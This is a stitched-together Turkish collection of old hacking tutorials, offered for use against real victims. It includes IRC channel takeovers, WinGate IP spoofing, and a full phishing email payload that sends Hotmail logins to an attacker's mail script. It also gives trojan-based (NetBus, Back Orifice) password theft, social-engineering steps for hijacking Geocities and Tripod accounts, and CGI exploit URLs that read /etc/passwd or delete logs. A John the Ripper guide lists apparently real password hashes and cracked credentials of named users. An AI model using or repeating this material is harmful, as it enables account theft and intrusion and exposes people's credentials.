Bu demektirki ayni firmanin(ornegin superonline)bir baska serverini deniicez.Yalniz dikkat edilmesi gereken husus sinyal yolculugumuzun hangi serverda bittigi hep ayni server da bitiyosa bu demektirki bu server ana serverdir

Hehehe bakin bunda firewall falan yok hohohoyt temiz simdiiii sira geldi PORTSURF a....

Simdi telnetlerinizi acicaksiniz ve preferences te local echo kismini tikleyin baglanti olarak (yukardaki ornege gore 198.83.210.28)yazin(echo tiklanmazsa win95 telnet ekraninda bisii goremezsiniz)

Connect remote sysstemde telnet yazan menude daytime yi secin ve connect olun size tarih saat ve zamani bildiren bir msg gelicek tabbiki serverin bash history sine kaydiniz gecicek sysadmin oha noluyo lam onune gelen bizim servere girmis diicek

Daha ileri ve tehlikeli safhalarda port surf yapmak mumkun anlatirmiyim bilemiyorum cunku bu isler basinizi agritabilir benden solemesi vallaaaa(anlatacam):)))

BU SAYFALARDAKI TUM BILGILER EGITIMSEL AMACLIDIR KISILERIN YAPTIKLARI TAMAMEN KENDILERINI BAGLAR INTERNET HIRSIZLIGI BIR SUCTUR VE CEZAASI AGIRDIR BILGILERINIZI KOTU EMELLERE ALET ETMEYINIZ

Bu olayin once bi takim seylerini aydinlatayim IRC yi hack etmek icin sabirli ve gozlemci olmalisiniz bu bir. Siz serveri diil sadece kanallari hack edebilirsiniz bu iki anlatacagim teknikler her IRC serveri veya kanali icin gecerli olmaya bilir bu da uccc.Ve son olarak yaptiiniz bu sakadan dolayi k-line olursaniz mesuliyet kabul etmem buda soooooon.

IRC hack etmek isteyenler oncelikle asagida anlatacagim programlara sahip olmaliler eger bu programlari cekmezseniz hic bi halt yiyemezsiniz.

Eger bir chat serveri ustnde accountunuz varsa(shell)ki bunu elde etmek icin op olmaniz veya sop olmaniz gerekir size tavsiyem IRC shell script kullanmanizdir.Bu konuda bildigim en iyi program LICE adli bir shell script programi .LICE command lari oldukca genis ve guclu eger shellaccontunuz varsa ve ileri derece bir kullaniciyseniz LICE yi kullanmanizi tavsiye edicem

Ama bir cok kullanici gibi ben sizin IRC serverlere slip/ppp protokolu ile baglandiinizi dusunup bu protokole gore tavsiye edecegim iki program var .Bunlardan birincisi (MCB) diye bildigimiz Multi-Collide-Bot digeri ise (LL) diye bilinen LinkLooker .

Sizin hedefiniz herhangi bir serverin split olmasini beklemek (bolunme bunu cogu zaman yasiyoruz)Server split oldugunda kanala girip (ilk siz girmelisiniz) op olmak. LL(link looker) denen program iste bu ise yariyor.yani bir server split oldugun da size haber veriyor sizde servere dalip hack etmek istediginiz kanala ilk girip op u kapiyorsunuz.Tabiki bu yontem cok buyuk kanallar icin imkansiz gibi bisey..(ornegin:undernet-istanbul)

BOT denen sey aslinda ROBOT tan baska bisi degildir.Buyuk firmalar kanallarinda mutlaka BOT bulundururlar(ornegin:Undernet @X vaya @Y) BOT lar kanallarda otomatik olarak uygulanmasi gereken prosedurleri uygular(ban-kick-auto op gibi...)Yani guvenlikli ve BOT kullanan bi sistemde kanal split olduktan sonra siz kanala girip op olsaniz bile BOT sizi deop yapacaktir(BOT olmasa bile LICE yazilimina sahip bir insan op ta sizi deop yapabilir).

Iste MCB diye bahsettigim program(multi-Collide-Bot) sizin kill edeceginiz nick lerin (bunlar tabiiki op olmali)bir klonlarini yaratarak BOT un syncronisationunu bozar MCB ye nickleri ve kanal ismini vermeniz yeterli(tabiki bu kanal split olnus olmali bunu LL ile tespit ediceksiniz)evet nickler deop olduktan sonra hemen serverdan dissconnect olup tekrar connect olun ve kanala girin hehehe op mop olmadigini goreceksiniz...

1-Sabir sizi basariya goturecektir oncelikle takeover edeceginiz kanali cok iyi gozlemlemelisiniz.Dusmaninizi tanimalisiniz ,kanali yoneten BOT veya insan oplarin vazifelerini kanala devam durumlarini not edin.Ozellikle rejoin lerde deop gorevini kimin yaptigini(genel de BOT tur) mutlaka tespit edin.Kick-ban...vs islemlerini odada okuyun herkesin gorevini bilin

2-Oplar MCB saldirilarina karsi surekli nicklerini degistirirler bunlara dikkat edin eger MCB ye yanlis girerseniz operasyon basarisiz olur.Bu yuzden fake bir MCB duzenleyin ve alternatif nicklerini ogrenin ve bu nicklere gore yedek MCB hazir da bulundurun...

3-Anlatigim prosedur biraz hizli davranmayi gerektirir bu yuzden panik olmayin sakin olun onlar sizden daha yavas kalacaktir(oplar)

4-Mutlaka operasyonlariniza ufak ve guvenliksiz kanallarda baslayin aksi taktirde yeterli tecrubeniz olmadan buyuk kanallari hack etmeniz zorlasacaktir

5-IRC hack icin baska tekniklerde vardir ama beginner icin en ideali budur daha genis bilgi verecem

IP GİZLEME spoofing.

Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini
kullanmasini saglamak icin kullanilir.Ornek:internet cafeler.
Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da
yani wingate yuklu ve calismakta olan makinada 23. port a telnet cektiginizde su cevabi alirsiniz.

WinGate>

bu komut satirinda komutlar vererek baska yerlere baglanmak mumkundur.Tabi burdan baglandigimiz
makinalarda bizim degil baglandigimiz wingate server in ip sini goreceklerdir.

Asama -1- Bir wingate server i bulma:

Bunun icin en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve boylece
kendi serverlarimizi bulmaktir.Piyasada disariya acik oldugu bilinen yuzlerce server vardir
ama bunlari kullanmanizi tavsiye etmem cunku herkes onlara yuklendigi icin bunlardan
spoofladiginizda lag a girersininiz.Tavsiyem GateScan programi.Bu program verilen ip araliklarinda
secilmis bir port un acik olup olmadigini ; eger aciksa belli bir cevabi(recieve string) verip vermedigini kontrol eder.
Normal durumda,siz degisdirmediginiz surece(halimize bak bi default lafi kullanmicaz diye
kendimizi paraliyoz) port 23 ve receive string WinGate> dir yani wingate serverlarini tespit etmeye
hazirdir.En ustteki kutuya bir ip yazdiginizda ornegin 194.54.48.63 olsun 194.54.48.0 dan baslayarak 194.54.48.255 e kadar
hepsinin 23 . portuna baglanacak WinGate> cevabini verip vermediklerini kontrol edecektir.Tavsiyem irc ye girin
millete dns cekin gelen ip leri buraya yazin.En guzel serverlar Boyle Gecici ip lerden cikar.
Ama 2 saat sonra nolucagini bilemezsiniz.emin olmak isterseniz sitedeki wingate listesindeki server lari
kullanin.

Simdi wingate ip lerimiz hazir dielim. Mesela ip miz 195.33.226.5 olsun.Spooflayacagimiz server da irc.emu.edu.tr olsun

mIRC yi acin

/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a baglaniyoruz.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te edebilirsiniz.

bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.WinGate> demesini bekleyin......

WinGate> deyince

/quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz.

Yine bisuru sey sayikliyacaktir onlari da iplemeyin ....
Muhim olan "irc.emu.edu.tr Connected" demesi.Bunu gorunce

/quote user xxxxx xxxxx mail@adresiniz.com xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim degildir.Bunlar millet size whois cektiginde gorunecek yazilardir.Istediginizi yazabilirsiniz muhim olan kelime sayisinin ayni olmasi.

/quote nick isminiz

Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Eger olmassa baska serverlar deneyin.Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz

Önce bir yerden VisualBasic temin ediniz. 6.0 versiyonu önerilir.

Yeni bir Proje açın ve formunuza Toolbar (araç kutusu) dan bir TextBox ekleyin.
Buraya program bittiğinde icq numarası yazılcak. Şimdi yine ToolBar menüsünden
Command1 adlı butonu ekleyiniz. Tabi bu arada programınıza istediğiniz gibi dizayn
yapabilirsiniz. Şimdi Command1 adlı butona çift tıklayınız. Size kod penceresi gelcek
oraya şunları yazınız.

Private Sub Command1_Click()
Url="Http://online.mirabilis.com/scripts/online.dll?icq="&text1.text
&"&img=1online.gif" 'Bu satır üsttekinin devamı

Shell ("start "&url)
End Sub

Daha sonra programı compile edin. (File/Make EXE file)

Ve programınız hazır. Bu kadar kolaymış

HOTMAIL HACK

Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?

Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman Javascript kodu devreye
giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca size kurbanin kullanici adi ve ip adresini iceren bir e-mail
geliyor.

Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini kazaniyorsunuz.silmek, okumak, kurban
adina mailler göndermek... Tabii siz bos durmayip POP Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki
hesaplarinin sifrelerini aliyorsunuz.

Peki bu olaydan kurtulamayacagiz mi ??? .

Netscape kullanicilari javascript ayarlarini söyle kapatabilir. (edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view / internet options /security / custom
settings / scripting / disable active scripting).

Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???

Asagidaki Listedekiler elimizde olmali.

1 Internete bagli bir bilgisayar... eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programi)
1 Notepad (veya herhangi bir text editor)

1.ADIM:

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi
vermemize gerek yok. Rastgele birseyler yazsakta olur.

2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi
vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir e-mail adresi
aldik.örnegin(ybwc@oocities.com).

3.ADIM:

NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir 17'de
Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre degistirin.)

<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.oocities.org/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font
face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\"
value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>

4.ADIM

kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve
gönderiyoruz.

5.ADIM

Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail
aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi

Scan ederek bulduğum Patchlenmiş Netbus Kurbanını daha sonra yine Hacklemek
istiyorum, nası olcak?

Netbusda File Manager'dan Show files'e basın ve c:\program files\ICQ\UIN
directorysindeki *.UIN dosyasını Download ederek kendi bilgisayarınızda çalıştırın.
Böylece adamı ICQ listenize alırsınız, Online olduğunda başına yine bela açarsınız

Geocities, Tripod gibi ücretsiz yer veren siteleri Hack Etmek
Bi web sayfasını hack etmenin en kolay yolu Backoffricele adama bağlanıp email şifresini çalmaktır..eğer sayfa xoom tabanlı filansa
zaten Backoffrice sayfanın şifresini size göstericek. Diilse adamın int. Şifresini alın passes komutuyla email adresi şifresiyle aynıdır
daha sonra ise Geocities ,xoom ..ya mail attın bunların hepsinde şifremi unuttum email adresime postalayın bölümü vardır o bölümden
mail atın 5 dakka sonra adamın mail hesabına girin..o kadar basit.

Geocitiesi HACK etmek için önce Hotmail gibi bi yerden bi email adresi alın sonra Geocities adreslerini tarayın sayfanın sahibinin ad
soyad doğum tarihini ve email adresini veren bi sayfa bulun. www.oocities.org/SiliconValley/1001 den başlayın 1002
1003.....tarayın.tataa buldunuz şimdi http://www.oocities.org/help/pass_form.html adresine gidin (bu adres değişmiş olabilir ama
daima geocities in içinde help bölümündedir!)Formda Geocities in database indeki email adresini sorduğunda adamın amil adresini
yazın ve daha sonra yeni emaili işaretleyin ve Hotmailden aldığınız email adresini yazın ve daha sonra hotmaile uğrayın aa şifreyi
göndermişler.

Ama göndermeyede bilirler kesin bi ihtimal diildir bu (yoksa her önüne gelen geocitiesi kırardı )Eğer geocitiesdeki yönetici
sandığımızdan daha akıllıysa adama mail atın ve yanlışlıkla şifreyi değiştirdiğinizi ve email adresiniziz değiştiğini söyleyin eğer şifreyi
değiştirdiğinizi duyarlarsa ailenizin sizi öldüreceğini söylemeyi unutmayın!

Eğer adamın özellikleri websayfasında yoksa sayfanın sahibine mail atın kalem arkadaşı olmak istediğinizi söyleyin ve adamı kafaya
alıp bütün özelliklerini alın ve formda yerine yazın =)

TRİPODU KIRMAK

Tripod’u kırmak için sadece internet hesabına ve 1-2 hafta süreye ihtiyacınız var.Önce adamın Tripoid user nameine ihtiyacınız var.
http://members.tripod.com/~username (user name bu adreste en sona yazdığınız işte)sonra adamın gerçek ismini öğrenmelisiniz:
http://www.tripod.com/planet/profile/search.html adresinden adam hakkında bildiğiniz herşeyi yazarak öğrenebilirsiniz eğer
member profile girebilirseniz adam hakkındaki herşeyi öğreniceksiniz city,country...Eğer bu adresten bulamazsanız adam buraya bi
member profile koymamış demektir o zaman Icq dan info çekin adama =)

"If you need to change your email address, please contact us at membership@tripod.com with your new email address. Please include
your member name, old email address, and full name in the message." **************************************end

Bu yazıda diyoki email adresinizi değiştirdiyseniz kullanıcı adınızı ve eski email adresinizi tüm isminiz ve soyisminizi yazın vve yeni
email adresinizi (hotmailden aldığınızı)Sonra size böyle bi email gelicek

Dear "User", Thank you for informing us of your new email address. We have updated your membership information:Tripod member
name: eskikullanıcıadı (unchanged)

SITELERI CGI/BIN ACIKLARINDAN YARALANIP KIRMAK

a- (Phf scripti): Pek cok web ana bilgisayari CGI-BIN guvenli?inden

yoksundur. Bir de bunun uzerine sistem yöneticilerinin CGI-BIN guvenlik

aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum

dunyada pek cok hacker'in kullandi?i cgi-bin guvenlik aci?i:

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd

Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini

sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine

de alternatif web makinalari uzerinde denemekte yarar var.

b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu

hatayi da söyle istismar edebiliriz:

http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?../../../etc/passwd

http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edece?imiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (basariya ulasabilme

ihtimali kadar ulasamama ihtimali de var)

http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?../../../etc/passwd

ya da

http://www.kiraca?imizadres.com.tr/cgi-bin/view-source?%1b or

%0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd

e- Di?er Denenebilir Scriptler:

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s

%205000%20ip%20to%20shoot

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.kiraca?imizadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

1-ilk olarak ips.zip we boguiyi aynı dizine açın! we boclient'ı çalıştırın.

2-Karşınıza gelen ekranda "is.txt" yazılı bi dizin war altında da "sweep!!!" ve "IP List" gibi 2 seçenek war biz o satıra
accountu hacklemek istediğimiz turk.txt(turknet IP list), super.txt (Superonline IP list), birnet.txt (Birnet IP list) 'den birini
yazıcaz, şimdilik elimizde bukadar kaynak war ilerki zamanlarda yeni ip listelerinide burdan indirebilceksiniz.
Accountunu hackliiceğimis ipsyi yazdıktan sonra "SWEEP!!!" seçeneyine tıklayın. Ipleri taramaya başlasın !!.

3-!PONG!1.20!"bilgisayarın adı" "ip" çıktığında o kişide bo patch'i açılı demektir !!.

4-Yukarda, TARGET bolumunde Host: yazan yere !PONG!1.20! yanında gorduğunuz ipyi yazın !!.

5-Commands bolumunden system passwords'e tıklayın we siyah ekrana adamın passwordları dokulmeye başladı hade
kolay gelsin :]

Bilinmeyen numaraları bulmak icin 118'in kapısında beklesmeyin 117'yi deneyin..

1)Once Windows 95 veya 98'inizde Hyper Terminal yuklumu degilmi kontrol edin. Eger yuklu ise Start *Programs*
Accessories* Communications bölümünde goruyor olmanız lazım. Eger gormuyorsanız Start menusunden Settings
*Control Panel* Add Remove Programs komutunu calıstırın. Ekrana gelecek olan diyalog kutusunun Windows Setup
bolumune gelin. Buradaki listeden Communications secenegini aktif hale getirin ve Details dugmesine basın. Ekrana
gelecek diyalog kutusundan Hyper Terminal secenegini aktif hale getirin ve OK dugmesine basın. Program
sisteminize eklenecektir.

2)Start Menusunden Programs* Accessories* Communications* Hyper Terminal yapın. Bir klasor acılacak. Burada
HYPERTRM.EXE uzerine cift tıklayın. Yeni bir hyperterminal baglantısı yaratmanıza yardımcı olacak bir diyalog
kutusu acılacaktır.

3)Bu diyalog kutusunda Name bolumune "bilinmeyen numaralar" yazın ve Enter tusuna basın

ACCOUNT HACK 1 Account Hack

....Aşağıdaki işlemleri DOS da uygulayınız....

C:\Tool\hack\crackers\john>John bilmemnenetpass.txt -i:ALL -beep

John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer

Loaded 246 passwords with 198 different salts (DES)

baro (baroktp)
tuna (atanik)
sony (hasel)
1976 (guzine)
1963 (adeniz)
1970 (nsterzi)
1961 (simge)
1098 (mgokalp)
1997 (gelegen)
cana (tsengor)
murat (hmurat)
pati (sug)
trash (bulut)
m2112 (mugo)
candan (odonmez)

John bilmemnenetpass.txt -i:ALL -beep ----> Burada ALL:hem rakam , hem harf olduunu belirtmektedir.

ALL yerine ALPHA yazarsanIz sadece harf , DIGIT yazarsanIz sadece rakamlarI göz önünde

bulundurur.

Ancak öncelikle Türkiye deki iss lerin %90 I min:4 , max:8 karakter kullanmaktadIrlar. Bu sebeple

isiniz daa kolaylassIn die John.ini dosyasInIn icinden max ve min i ayarlamanIzI tavsiye ederim.

bilmemnenetpass.txt ise , mesela atonetten(prizma,raksnet...) şifre aldInIz ve nete baalandInIz.Ftpden

baalanIn (ftp.****.net) ve pass dosyasInI indirin iste burda yazan *.txt dosyasI ftpden indirilmis

dosyadIr.Bu anlattIIm yöntem wordlist gerektirmeyen kolay yöntemdir.Son olarakta dosta yazdIImIz

-beep her pass kIrIldIgInda size haber vermesi icin yararlIdIr...

Eger kırma islemini wordlistle yapmak istiyorsanız ki ben bunu tavsiye ederim,o zaman buradaki satIrI dosta
yazmanIz gerekir;

john -wordfile:wordlist.txt -pwfile:herhanginetpass.txt >sonuclar.txt

wordlist.txt elinizde bulunan kelime arsivleridir.Iste size meliksah In yazdIgI bir program,adI sibop ve güzel bir
wordlist hazIrlayan program,Download ediniz;

herhanginetpass.txt elinizde bulunan ftp ile alInmIs password dosyasIdIr,unshadowludur,denemelik bunu alIn;

sonuclar.txt ise ;

cana (tsengor)

murat (hmurat)

Bu sekilde kırIlacak passwordlerin bulunacagI dosyadIr.parantez icindeki password

Account Hack

John The Ripper Kullanimi Basit Olan ve En iyi crack programlarindan biri==>
Acc kirmak icin passwd diye adlandirilan dosyalardan elinizde bulunmasi lazim bunu bazi yeni isp lerin ftplerinden (oranin ftp
kullanici iseniz genelde etc/passwd dizininde bulunurlar) cekmenize izin verirler.Anonymous baglantilarda bu dosyalari cekmenize
izin verilmez. Bu tip dosyalari toparladiktan sonra. John The ripper programini cekmelisiniz

Simdi John da kendiliginden 3 adet kirma bicimi var. Bunlar: ALPHA : Sadece harfler DIGITS : Sadece rakamlar ALL : Hepsi

Simdi John.ini dosyasyny actiginyzda oradan kullanacaginiz bicimi bulun. Mesela ALPHA yi bulalym. Bulduk Simdi altta Minimum
ve Maximum lenght var. Bunlar en az ve en cok hane sayisidir. SOL disinda Turkiye'deki butun ISP lerde minimum 4 maximum 8
hane vardir. Tamam bunuda ayarladik diyelim. Daha sonra dos komut satirinda Sunlary yazyn: JOHN dosyaadi -i:bicim -beep
(burada dosya adi bizim netten cektigimiz passwd dosyasi oluyor. Burda bicim yerine ALL ALPHA veya DIGITS yazicaksiniz. BEEP
ise her pass kirdiginda bip sesi cikarmasini saglar. Örnek : John passwd.txt -i:ALL -beep heee bide wordlist ile Kirrma Yöntemi vardir.
Bu Yöntem Çok Degisiktir:ilk önce bir wordlist yaratirsiniz (Çok iyi Bir Arsiv Hazirladim!!!Kesin Bulundurun!!
<http://www.uha1.com/wordlist/words.zip>) John butun harfleri ve digitleri teker teker deneyecegine sizin verdiginiz Dosyadaki
kelimeleri dener!!
Kullanim Yöntemi ise:: john <dosya adi> -w:<wordlist adi> -beep

------------John The Ripper Kullanma Kiilavuzu-----------

John the Ripper(kisaca John amca) bence piyasada bulabilceginiz en baba unix passwd cracker dir.simdi siz herhangi bir yöntemle
passwd yi cektiniz.Ama birinci soru bu passwd shadowed mu.Shadowed passwd
lerde sadece o user in sifresinin shadow file daki yerini belirten bi sayi olur ve o sayiya göre makine shadow file a bakar ve
o username icin girelen password ile dosyadaki password u karsilastirir. Yani asil almaniz gereken dosya shadowed sitemlerde
/etc/shadow dur ama bu dosyaya erisim hakki sadece super user a aittir.(root)Yani sikar biraz. Kisaca Shdowed bi dosya Shadow
file olmadan bi bok a yaramaz.Kiramazsiniz

Alin size Shodowed ve un Shadowed passwd örnekleri::

Bu satirlar shadowed bi passwd dosyasindan alinmistir(ispronet Clansman'dan aldik lawuk shadowed u cekmis euheuhe)

root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh
toor:*:0:0:Bourne-again Superuser:/root
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent

ilk satiri inceleyelim

s.N= shadow nosu=shadow file daki no su

|user| |s.N| |ayrintilar| |dizini| |shell dizini ve turu|
root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh

Bu satirlarda shadow lanmamis passwd den:: (Bm -Net)

atabarut:iP0nvdXsd0bE2:504:100:Necdet Atabarut:/home/atabarut:/bin/sh
abali:btf6TGc5jaCwY:505:100:Muammer Abali:/home/abali:/usr/local/bin/dmenu
ceyhun:7kTb6N0tEaTcE:508:100:Ceyhun Ors:/home/ceyhun:/usr/local/bin/dmenu
kadircan:xt4UmVJxTBpbw:507:100:Kadircan Abali:/home/kadircan:/usr/local/bin/dmenu

Sanirim bunda incelemeye gerek yok olay acik.Ayni seyler gecerli.

--
-----------simdi gelelim kirma isleminee::------------

Benim tavsiyem Wordlist yani kelime listesi kullanmaniz. Eger Wordlist ne derseniz belli sayida harfin tum kombinasyonlarinin
her satirda bir kelime olmak uzere metin dosyasi haline getirilmisidir. Wordlist olusturmak icin meliksah aganin Sibop unu tavsiye
ederim. (8 karakterli bir wordlist= 1.5 GB)

------John un wordlistli kirma komutu:::-------

john -wordfile:wordlist dosyasini buraya yazininiz -pwfile:sifredosyasini buraya yaziniz. > kirilan sifrelerin kaydedilecegi dosya adini
buraya yaziniz. size bi tavsiye 4 karakterli sadece sayidan olusan bi wordlist hazirlayin
(0.5 mb bile tutmaz)Dogum tarihini sifre yapanlari yakalarsininiz.

ha bu arada son kisma kayit dosyasi yazdiimiz icin eger bi bokluk ciksa bile john bisey demicektir.sasirmayin herhangi bir hata
falan verirse bunlarda o yazdigimiz dosyaya kaydedilecektir. islem bittinde bu dosyayi herhangi bir metin editöru ile acip
bakabilirsiniz.
yada kayit dosyasi kullanmadan yapin gerci tavsiye etmem.Format falan atarsaniz yada john.pot u bi sekilde kayberderseniz.
kirdiklariniz gider.Ama kayit dosyasi bu riski kaldirir.

------Kayit dosyasi olmadan kirma komuttu::------------

john -wordfile:listedosyasi -pwfile:sifredosyasi bu komut ile kirdiginizda sifreler ekrana cikar.

-------------------örnek verim.-------------------------------------

John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer Loaded 201 passwords with 170 different salts (DES)

onguru10 (onguru) aytac11 (ksoytac) aytac11 (ksaytac) ali19 (ayata) tunay94 (tunay) ofalay96 (ofalay) hyb96 (ferhan )hyb96
(ertugrul) tatko97 (tatko) uler97 (mukaddes) kbc97 (kbc) susen97 (susen) ttggrd97 (ttggrd)bircan97 (bircan) bilal97 (bilal) ykocak97
(ykocak) aaker97 (aaker) levent97 (levente) aristo97 (aristo)

--Parantez icindekiler usernamedir.
> Sonradan bu kirilan acc leri tekrar cikartmak isterseniz john -show sifredosyasi yaziniz.

-------------------------simdi gecelim Single Mod a--------------------

Single mod da john amca sadece passwordu ile kullanici ayrintilari yada username i yakin olan sifreleri kirar.hasan-hasan98 gibi
yada ayrintilarda amcuk insaat as yaziyorsa.hasan-amcukins gibi. Cok hizlidir 5 dk da ato dan 90 tane acc kirarsiniz.Bu komut cok
faydalidir ama herkes ilk bunla kiracagi icin kircaganiz acc lar coktan orospu olmus herkesin eline gecmistir.
Bu yuzden eger saglikli bi acc istiyorsaniz.Diger modlarda kiriniz.

Komut ise söyledir.

John -single dosyaadi>kayitdosyasi kayit dosyasi olayina tekrar girmicem heralde kapmissinizdir.

-------------------------------incremenntal Mod----------------------------

John amca incremental mod da o an rastgele karakter kombinasyonlari ureterek (eger ayar ellenmezse kafadan(default) 8
karakterdir) bunlari sifre olarak dener. Bu da sizi wordlist kullanmaktan bi derece kurtarir ama asla wordlist kadar hizli diildir
ve wordlist kadar cok kiramaz.Ayrica hic durmaz bu ctrl-break cekerek siz durduracaksininiz.Bu modda kayit dosyasi tavsiye etmem
cunku uzun sure bi sey kirmadiginda anlayamaz,bu yuzden de ne zaman kapatmaniz gerektiini kestirmezsiniz.

----Komut:----

John -incremental:xxxx dosyaadi burdaki xxxx incremental in cesitidir.Buraya all yazarsaniz tum karakterler. Digits yazarsaniz
sayilar(dogum tarihini sifre olarak kullananlar icin birebir).Alpha yazarsaniz harfler uretilir.

------Temel Komutlar bu kadar ha bide uunutmadan BEEP olayi var------------

yazdigimiz bu komutlarin herhangi birine -beep eklerseniz her sifre bulduunda pc hoparlörunden biiiip sesi gelir.Ben bunu hep
kullanirim.Yan odada Tv seyrederken Pc odamda sifre kirar ve biiip sesini duyunca pc nin basina kosarim hemen.
---------------------------Son-----------------------------------------------
Ulan bu kadar anlattik gene gelir soru sorarsaniz gebertirim.........
ama genede sorulariniz icin

tarzan@free.efes.net

John The Ripper

Ufak bir not: Wordlistler degisken olduklari icin bu sayfada yayinlanmamistir. ister kendiniz yapin ister bir yerlerden
bulun.Biz turkiyeli oldugumuz icin yabancilarin yaptiklari wordlistleri kullanmayin

Size turkce wordlist yapabilmeniz icin gerekli bir program
Sibop

BIR EKLENTI

www.ibm.net ten sahte account alin orada baglanti programini da cekin. Authorization codu soracak size: (ibmbyob)
yazin (ibmnet de yazabilirsiniz)
ikinci bir yol ise alin su programi gidin internet baglantisi olan bir arkadasiniza yada internet cafe ye bu programi
calistirip yildizli password un ustune dogru surukleyin.

windows yildizli password cozucu

Ayrica internette trojan scanner ile tarattirarark bir suru account
toplayablirsiniz trojan bolumunde gerekli dosyalar vardir

